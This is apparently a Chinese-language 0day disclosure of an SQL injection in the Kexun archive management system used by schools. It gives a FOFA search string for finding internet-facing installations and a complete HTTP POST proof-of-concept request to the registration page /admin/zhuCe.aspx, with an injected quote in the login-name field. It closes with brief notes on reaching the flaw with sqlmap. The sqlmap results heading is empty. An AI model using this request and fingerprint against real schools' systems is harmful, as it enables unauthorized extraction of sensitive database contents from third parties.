科讯档案管理系统存在SQL注入漏洞(0day)
漏洞描述
安徽科迅教育装备20年来来始终坚持智慧校园集成方案产品的开发和部署应用,我们有完善的智慧校园和数字校园建设方案,根据不同的学校不同的实际情况量身定做系统集成方案。产品主要是为了实现校园的智慧网络、智慧OA、智慧教学、智慧学习、数字医疗、智慧安防、智慧平台、校园一卡通智慧结算等。科讯档案管理系统多接口存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。
FOFA:
body="安徽省科迅教育装备有限公司 版权所有"
漏洞复现
POC:
POST /admin/zhuCe.aspx HTTP/1.1
Host:
Content-Length: 1276
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1/admin/zhuCe.aspx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_f8d0a8c400404989e195270b0bbf060a=1722057915,1724161841; ASP.NET_SessionId=cnxjymugm5vz2pewu1wim2i5; CheckCode=2874
Connection: keep-alive
__VIEWSTATE=%2FwEPDwUJOTE2NzUxOTMwD2QWAgIDD2QWAgINDxAPFgYeDURhdGFUZXh0RmllbGQFBE5hbWUeDkRhdGFWYWx1ZUZpZWxkBQJJZB4LXyFEYXRhQm91bmRnZBAVDgnlupPnrqHpg6gP5Lq65Yqb6LWE5rqQ5aSECeWtpueUn%2BWkhA%2Fop4TliJLlj5HlsZXlpIQJ5oub55Sf5aSED%2BWfueiureWwseS4muWkhAnmgLvliqHlpIQP55uR5a%2Bf5a6h6K6h5aSEEuaguOeRnuWKs%2BWKoeWFrOWPuA%2Fln7rnoYDmlZnlrabpg6gP5qC455S15bel56iL57O7GOaVmeiCsuS4juenkeWtpuaKgOacr%2Bezuw%2FkuqTpgJrlt6XnqIvns7sK5YWa5pS%2F5YqeMhUOATEBNgE3ATkCMTACMTECMTICMTMCMTQCMTUCMTYCMTcCMTgCMzAUKwMOZ2dnZ2dnZ2dnZ2dnZ2dkZGRkQ5AxhnFuBQpRovjoynY6l6Jz20JB9%2BK3gZcFAMynfA%3D%3D&__VIEWSTATEGENERATOR=5A8EE21C&__EVENTVALIDATION=%2FwEdABYgUMRUOpnaTvT3MuTcc9EMnIXzDkrCrcbL0RzCfU3JozPzhWZ6gm6le6MUtp6VelIVLCsBEnBJc2CPcvfKwmoXM9KW7XpjHhBuINT5110rU73hoBAJzRZeyqYigwFTnuFy8BGjfquCLoLrVWyeBSOAsjxEOdVYGWgUKkCRqsD%2B8GBeSBtpFcnkARWlh0DiBtTUUI6khBLVHQWydeVVf2Co9CZXvTqeIJBfgJMMaexMGEH3a3QK4%2BERtk5Q60GujGvjgNMYWRz%2BqmMhKoVvbXdgL64n1e00Z3%2BaK3k3w2LHinIdmulgZ3eziAPp0ddszYXSxHrVyknRyG6pkcaz3kGdrnQUC79JcT%2BnHsotSJV5InDCG6sD1npFWRzd77SAvEtqp%2BHgzjKsJIetRcrTTNorOZYVAeSDCngdB4D9FxqIghmk0MkjVEwrXYdpoK2OVqdh2nw8styvTRiSboYiD9A%2BGOzUrqY%2FiCUzL2epOTZ46HlgcfjMYvR73uamwXkck1g%3D&hid_DocumentList=0&hid_type=0&txt_loginName=admin'&txtPwd=1&txtPwd2=1&txt_nickName=1&ddl_bumen=1&btn_save=%E4%BF%9D%E5%AD%98
sqlmap结果:
记录:
看到注册接口我想到的是XSS
尝试注册
猜测用户名带到后端去查询了,尝试sql注入
没过滤非法字符,sqlmap直接跑